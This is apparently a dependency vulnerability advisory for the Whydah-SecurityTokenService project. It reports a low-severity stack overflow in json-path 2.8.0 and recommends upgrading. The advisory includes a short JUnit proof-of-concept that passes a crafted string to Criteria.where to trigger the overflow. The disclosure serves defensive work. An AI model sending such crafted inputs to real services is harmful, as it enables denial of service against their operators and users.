Vulnerabilities: 1 via 1 paths

Dependencies: 108

Source: GitHub

Commit: 99892b1c


low severity

Buffer Overflow

  • Vulnerable module: com.jayway.jsonpath:json-path
  • Introduced through: net.whydah.sso:Whydah-Admin-SDK@2.22.0

Detailed paths

  • Introduced through: Cantara/Whydah-SecurityTokenService@Cantara/Whydah-SecurityTokenService#99892b1c565c337fe456c7395bcc19335ebdc172 > net.whydah.sso:Whydah-Admin-SDK@2.22.0 > net.whydah.sso:Whydah-Java-SDK@2.22.0 > net.whydah.sso:Whydah-TypeLib@2.22.0 > com.jayway.jsonpath:json-path@2.8.0

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the deprecated Criteria.parse or Criteria.where methods. An attacker can disrupt the regular operation of the application by supplying specially crafted input that triggers a stack overflow. Exploiting this vulnerability requires an insecure configuration on the server side, for example, handling requests in a single thread.

PoC

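import com.jayway.jsonpath.Criteria;
import org.junit.Test;

public class CriteriaFuzzerWhere1 {
    // Stack overflow
    @Test
    public void whereFuzzerTest() {
        try {
            // Crafted key passed to the deprecated Criteria.where method.
            Criteria result = Criteria.where("[']',");
        } catch (Exception e) {
            // StackOverflowError is a java.lang.Error, not an Exception,
            // so this handler does not intercept it.
        }
    }
}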

Remediation

Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.
